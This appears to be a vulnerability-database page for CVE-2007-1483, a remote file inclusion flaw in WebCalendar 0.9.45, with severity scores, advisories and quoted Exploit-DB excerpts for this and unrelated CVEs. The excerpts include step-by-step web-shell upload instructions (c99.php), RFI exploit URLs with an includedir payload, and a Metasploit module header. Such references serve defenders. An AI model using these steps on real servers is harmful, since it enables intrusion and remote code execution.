CVE-2007-1483
published 2007-03-16CVE-2007-1483: Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.06%
89.4th percentile
Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir parameter to (1) login.php, (2) get_reminders.php, or (3) get_events.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| k5n | webcalendar | — | — |
| k5n | webcalendar | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c32q-m2jw-8jp8: PHP remote file inclusion vulnerability in send_reminders
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-2836 [HIGH] CWE-94 GHSA-c32q-m2jw-8jp8: PHP remote file inclusion vulnerability in send_reminders
PHP remote file inclusion vulnerability in send_reminders.php in WebCalendar 1.0.4 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter and a 0 value for the noSet parameter, a different vector than CVE-2007-1483.
GHSA
GHSA-fvv8-w6rh-m9pr: Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0
ghsa_unreviewed·2022-05-01
CVE-2007-1483 [HIGH] CWE-94 GHSA-fvv8-w6rh-m9pr: Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0
Multiple PHP remote file inclusion vulnerabilities in WebCalendar 0.9.45 allow remote attackers to execute arbitrary PHP code via a URL in the includedir parameter to (1) login.php, (2) get_reminders.php, or (3) get_events.php.
Red Hat
RealPlayer: SWF Frame Handling Buffer Overflow
vendor_redhat·2008-07-25·CVSS 9.3
CVE-2007-5400 [CRITICAL] RealPlayer: SWF Frame Handling Buffer Overflow
RealPlayer: SWF Frame Handling Buffer Overflow
Heap-based buffer overflow in the Shockwave Flash (SWF) frame handling in RealNetworks RealPlayer 10.5 Build 6.0.12.1483 might allow remote attackers to execute arbitrary code via a crafted SWF file.
Red Hat
CVE-2007-2243: OpenSSH 4
vendor_redhat·CVSS 5.0
CVE-2007-2243 [MEDIUM] CVE-2007-2243: OpenSSH 4
OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
Statement: Not vulnerable. The OpenSSH packages as shipped with Red Hat Enterprise Linux do not contain S/KEY support.
No detection rules found.
Exploit-DB
RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-5601 RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)
RealPlayer - 'ierpplug.dll' ActiveX Control Playlist Name Buffer Overflow (Metasploit)
---
##
# $Id: realplayer_import.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and
RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the "Import()"
method, an attacker may be able to execute arbitrary code.
},
'License'
Exploit-DB
Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload
exploitdb·2009-04-20
CVE-2009-1483 Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload
Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload
---
Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/
- download: http://www.studiolounge.net/2007/08/17/address-book-25
- vuln file: upload-file.php
The upload-file.php doesn't check the type of archive
and you can uploaded the phpshell on the server.
~ [EXPLOITING]
1) /index2.php?title=add (upload your shell, ex: c99.php)
2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150)
3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php?
s=57b7b72739c79f02d990c4239c4169b9.php)
4) view shell: http://target/profiles/57b7b
Exploit-DB
WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
exploitdb·2007-03-15
CVE-2007-1483 WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
WebCalendar 0.9.45 - 'includedir' Remote File Inclusion
---
|-------------------------------------------------------------------------------|
| |
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include |
| |
| Script : WebCalendar |
| Version : v0.9.45 (13 Dec 2004) |
| Authord : Drackanz |
| Contact : Drackanz [at] gmail [] com |
| Vendor : http://www.k5n.us/webcalendar.php |
|-------------------------------------------------------------------------------|
| Bug in : |
| login.php |
| get_reminders.php |
| get_events.php |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[calendar]/ws/login.php?includedir=[evilscript] |
| http://localhost/[calendar]/ws/get_reminders.php?includedir=[evilscript] |
| http://l
No writeups or analysis indexed.
http://securityreason.com/securityalert/2425http://sourceforge.net/mailarchive/forum.php?thread_name=45EAF486.9080902%40k5n.us&forum_name=webcalendar-announcehttp://www.securityfocus.com/archive/1/462957/100/0/threadedhttp://www.securityfocus.com/archive/1/463288http://www.securityfocus.com/bid/23054https://exchange.xforce.ibmcloud.com/vulnerabilities/33008https://www.exploit-db.com/exploits/3492http://securityreason.com/securityalert/2425http://sourceforge.net/mailarchive/forum.php?thread_name=45EAF486.9080902%40k5n.us&forum_name=webcalendar-announcehttp://www.securityfocus.com/archive/1/462957/100/0/threadedhttp://www.securityfocus.com/archive/1/463288http://www.securityfocus.com/bid/23054https://exchange.xforce.ibmcloud.com/vulnerabilities/33008https://www.exploit-db.com/exploits/3492
2007-03-16
Published